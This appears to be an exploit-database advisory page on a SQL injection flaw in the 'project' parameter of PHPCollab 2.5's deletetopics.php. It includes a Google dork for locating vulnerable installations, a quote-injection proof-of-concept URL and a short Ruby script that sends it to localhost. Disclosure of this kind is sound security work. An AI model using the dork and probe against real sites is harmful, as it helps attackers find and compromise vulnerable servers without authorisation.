PHPCollab 2.5 - SQL Injection

vendor:

PHPCollab

by:

Wad Deek

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: PHPCollab

Affected Version From: 2.5

Affected Version To: 2.5

Patch Exists: NO

Related CWE:

CPE: a:phpcollab:phpcollab:2.5

Metasploit:

Other Scripts:

Platforms Tested: Windows 7

2015

PHPCollab 2.5 – SQL Injection

The PHPCollab 2.5 version is vulnerable to SQL Injection. An attacker can exploit this vulnerability by injecting malicious SQL queries in the 'project' parameter of the 'deletetopics.php' page. This can lead to unauthorized access, data theft, and further compromise of the system.

Mitigation:

Update to a patched version of PHPCollab. Sanitize and validate user input to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: PHPCollab 2.5 - SQL Injection
# Google Dork: filetype:php inurl:"/general/login.php?PHPSESSID="
# Date: 13/05/2015
# Exploit Author: Wad Deek
# Vendor Homepage: http://www.phpcollab.com/
# Software Link: http://sourceforge.net/projects/phpcollab/files/final/2.5/
# Version: 2.5
+>2.5<+ --> /docs/changes.txt
+>2.5<+ --> /docs/readme.txt
# Tested on: Xampp on Windows7
###################################################################################
PoC = http://127.0.0.1/phpcollab/topics/deletetopics.php?project=%27
###################################################################################
#=====================================================
require('mechanize')
agent = Mechanize.new()
agent.redirect_ok = false
agent.verify_mode = OpenSSL::SSL::VERIFY_NONE
#=====================================================
begin
html = agent.get("http://127.0.0.1/phpcollab/topics/deletetopics.php?project=%27")
rescue
else
puts(html.body())
end
#=====================================================